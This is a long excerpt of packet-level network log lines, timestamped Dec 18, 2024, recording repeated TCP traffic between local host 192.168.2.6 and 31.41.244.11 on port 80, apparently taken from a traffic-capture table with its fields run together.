                                                                                                                                                                  Dec 18, 2024 11:09:30.105274916 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.106081009 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.106122971 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.106170893 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.106209993 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.107187033 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.107232094 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.107325077 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.107359886 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.108038902 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.108083010 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.108218908 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.108258009 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.109011889 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.109051943 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.109114885 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.109153032 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.109999895 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.110042095 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.110155106 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.110193014 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.111040115 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.111080885 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.111104965 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.111144066 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.247175932 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.247220993 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.247324944 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.247513056 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.247761965 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.247812986 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.247828007 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.247869015 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.248723984 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.248866081 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.248908997 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.249739885 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.249834061 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.249881029 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.250709057 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.250767946 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.250864029 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.251698971 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.251717091 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.251863956 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.252676964 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.252733946 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.252774954 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.253642082 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.253690004 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.253724098 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.254595041 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.254648924 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.254700899 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.254743099 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.255589962 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.255697012 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.255742073 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.256608009 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.256716013 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.256762981 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.257602930 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.257652998 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.257703066 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.258547068 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.258598089 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.258657932 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.259478092 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.259536028 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.264533043 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.264571905 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.264632940 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.264930010 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.264974117 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.265024900 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.265933990 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.265983105 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.266016006 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.266887903 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.266969919 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.267016888 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.267951012 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.268002987 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.268106937 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.268884897 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.268934011 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.268965006 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.269000053 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.269849062 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.269949913 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.269990921 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.270863056 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.270987988 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.271033049 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.271801949 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.271841049 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.271883011 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.272821903 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.272872925 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.273013115 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.273049116 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.273792982 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.273880005 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.273940086 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.274821997 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.275124073 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.275166035 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.275768042 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.275810003 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.275851965 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.276715994 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.276753902 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.276817083 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.277507067 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.277707100 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.277849913 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.277888060 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.278664112 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.278767109 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.278809071 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.279892921 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.279932022 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.279942036 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.280677080 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.280729055 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.280747890 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.281817913 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.281846046 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.281867981 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.281886101 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.282612085 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.282759905 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.282808065 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.283627033 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.283721924 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.283770084 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.284629107 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.284655094 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.284714937 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.285568953 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.285718918 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.285765886 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.286581993 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.286796093 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.286844969 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.287538052 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.287594080 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.287640095 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.288511992 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.288538933 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.288558960 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.288588047 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.289514065 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.289540052 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.289585114 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.290580034 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.290625095 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.290657043 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.290755987 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.291454077 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.291565895 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.291608095 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.292423010 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.292561054 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.292599916 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.293446064 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.293490887 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.293541908 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.294389963 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.294437885 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.294517994 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.295360088 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.295454979 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.295500994 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.296361923 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.296411991 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.296516895 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.296561956 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.297368050 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.297461033 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.297502995 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.298325062 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.298496008 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.298541069 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.299357891 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.299444914 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.299494982 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.300271034 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.300316095 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.300374985 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.301259995 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.301301956 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.301345110 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.301562071 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.302321911 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.302431107 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.302476883 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.438396931 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.438476086 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.438596010 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.438647985 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.438813925 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.438867092 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.438880920 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.438924074 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.439580917 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.439632893 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.439676046 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.440087080 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.440557003 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.440623045 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.440666914 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.440859079 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.441535950 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.441592932 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.441637993 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.441714048 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.442553997 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.442603111 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.442645073 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.442708969 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.443542957 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.443928957 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.443969011 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.444607973 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.444705009 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.444741964 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.445449114 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.445487022 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.445564032 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.445641994 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.446418047 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.446471930 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.446516037 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.446676970 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.447412968 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.447453976 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.447527885 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.447561979 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.448415041 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.448463917 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.448559999 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.448606014 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.449378014 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.449498892 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.449549913 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.450364113 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.451689959 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.455682039 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.455755949 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.455790043 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.455832005 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.456093073 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.456130028 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.456171036 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.456209898 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.457292080 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.457343102 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.457389116 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.457427025 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.458065987 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.458111048 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.458168983 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.458204031 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.459053040 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.459089994 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.459168911 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.459203005 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.460901976 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.460917950 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.460958958 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.461005926 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.461085081 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.461127996 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.461163998 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.462447882 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.462462902 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.462493896 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.462515116 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.463026047 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.463073015 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.463094950 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.463128090 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.464000940 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.464035988 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.464050055 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.464073896 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.464946985 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.464993000 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.465068102 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.465121031 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.465970993 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.466084003 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.466123104 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.466928005 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.467016935 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.467056990 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.467879057 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:30.467921019 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:30.467988968 CET804991231.41.244.11192.168.2.6
